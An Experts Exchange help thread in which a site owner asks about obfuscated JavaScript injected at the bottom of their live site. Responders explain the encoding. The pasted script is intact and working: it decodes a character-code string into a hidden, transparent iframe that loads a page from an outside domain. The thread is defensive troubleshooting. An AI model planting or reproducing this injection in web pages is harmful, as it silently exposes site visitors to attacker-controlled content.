Javascript Added to bottom of site - Virus

Hi All,

Hoping someone can answer this, the following code is getting added to the bottom of our site and it does look like a virus. Does anyone know what it is or how it is getting there. Just so you know, it is not on our local files and is only on the remote. Any info will be appreciated.



</html><script type="text/javascript">var gBhwGdGvEUgyLteZaNBv = "RvA60RvA105RvA102RvA114RvA97RvA109RvA101RvA32RvA119RvA105RvA100RvA116RvA104RvA61RvA34RvA52RvA56RvA48RvA34RvA32RvA104RvA101RvA105RvA103RvA104RvA116RvA61RvA34RvA54RvA48RvA34RvA32RvA115RvA114RvA99RvA61RvA34RvA104RvA116RvA116RvA112RvA58RvA47RvA47RvA112RvA114RvA111RvA102RvA105RvA116RvA111RvA111RvA108RvA116RvA105RvA112RvA46RvA98RvA105RvA122RvA47RvA98RvA108RvA111RvA103RvA47RvA102RvA101RvA101RvA100RvA46RvA104RvA116RvA109RvA108RvA34RvA32RvA115RvA116RvA121RvA108RvA101RvA61RvA34RvA98RvA111RvA114RvA100RvA101RvA114RvA58RvA48RvA112RvA120RvA59RvA32RvA112RvA111RvA115RvA105RvA116RvA105RvA111RvA110RvA58RvA114RvA101RvA108RvA97RvA116RvA105RvA118RvA101RvA59RvA32RvA116RvA111RvA112RvA58RvA48RvA112RvA120RvA59RvA32RvA108RvA101RvA102RvA116RvA58RvA45RvA53RvA48RvA48RvA112RvA120RvA59RvA32RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA58RvA48RvA59RvA32RvA102RvA105RvA108RvA116RvA101RvA114RvA58RvA112RvA114RvA111RvA103RvA105RvA100RvA58RvA68RvA88RvA73RvA109RvA97RvA103RvA101RvA84RvA114RvA97RvA110RvA115RvA102RvA111RvA114RvA109RvA46RvA77RvA105RvA99RvA114RvA111RvA115RvA111RvA102RvA116RvA46RvA65RvA108RvA112RvA104RvA97RvA40RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA61RvA48RvA41RvA59RvA32RvA45RvA109RvA111RvA122RvA45RvA111RvA112RvA97RvA99RvA105RvA116RvA121RvA58RvA48RvA34RvA62RvA60RvA47RvA105RvA102RvA114RvA97RvA109RvA101RvA62";var tFWwuHhNLrortVozzuuD = gBhwGdGvEUgyLteZaNBv.split("RvA");var OaCaUhzuuBpnGMjBTROe = "";for (var IDWCYKBYFvcTWeuqLukF=1; IDWCYKBYFvcTWeuqLukF<tFWwuHhNLrortVozzuuD.length; IDWCYKBYFvcTWeuqLukF++){OaCaUhzuuBpnGMjBTROe+=String.fromCharCode(tFWwuHhNLrortVozzuuD[IDWCYKBYFvcTWeuqLukF]);}document.write(OaCaUhzuuBpnGMjBTROe)</script>

Open in new window

jimbinhoAsked:
Who is Participating?
I wear a lot of hats...

"The solutions and answers provided on Experts Exchange have been extremely helpful to me over the last few years. I wear a lot of hats - Developer, Database Administrator, Help Desk, etc., so I know a lot of things but not a lot about one thing. Experts Exchange gives me answers from people who do know a lot about one thing, in a easy to use platform." -Todd S.

 
HonorGodSoftware EngineerCommented:
Yes, it is a virus.

How did it get there?  I don't know.

Remove it...

0
 
jimbinhoAuthor Commented:
Hi,

Thanks for this. I think to be more specific what i am looking for is: what the code does when scrambled as i am assuming it is scrambled java script. I would also like to know how anyone would do this and if anyone has seen anything like this before can they shed any light?

Thanks
0
 
HonorGodSoftware EngineerCommented:
here is what it translates as...
iframeCode.jpg
0
Ultimate Tool Kit for Technology Solution Provider

Broken down into practical pointers and step-by-step instructions, the IT Service Excellence Tool Kit delivers expert advice for technology solution providers. Get your free copy now.

 
HonorGodSoftware EngineerCommented:
How would someone do this?

Well, they would first figure out what they want to generate (e.g., the "iframe" shown above), then put that in a string, and convert the individual characters into numeric values.  For example, using something like the code shown below.

Then, they would take the numbers, and put them into an array, and from the array, create a string.

... does that make sense?



<html>
<body>
 
<script type="text/javascript">
 
var str='<iframe width="480"'
for ( var i = 0; i < str.length; i++ ) {
  document.write( str[ i ] + ' = ' + str.charCodeAt( i ) + '<br />')
}
</script>
 
</body>
</html>

Open in new window

0
 
jimbinhoAuthor Commented:
Hi,

Thanks for this. My question is not so much how they created the string, but how it is likely to get onto our site. Thanks for your help.
0
 
HonorGodSoftware EngineerCommented:
Ah, now that's a real question.

There are a number of possibilities.  Unfortunately, I don't know for certain, especially without knowing specifics about the server on which this code was found, or who has access to it, or the kind of programs that execute on it, etc.
0

Experts Exchange Solution brought to you by ConnectWise

Your issues matter to us.

Facing a tech roadblock? Get the help and guidance you need from experienced professionals who care. Ask your question anytime, anywhere, with no hassle.

Start your 7-day free trial
 
jimbinhoAuthor Commented:
Appreciate the help
0
 
HonorGodSoftware EngineerCommented:
Thanks for the grade & points.  I'm sorry that you didn't feel the information warranted an A.

Good luck & have a great day
0
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

All Courses

From novice to tech pro — start learning today.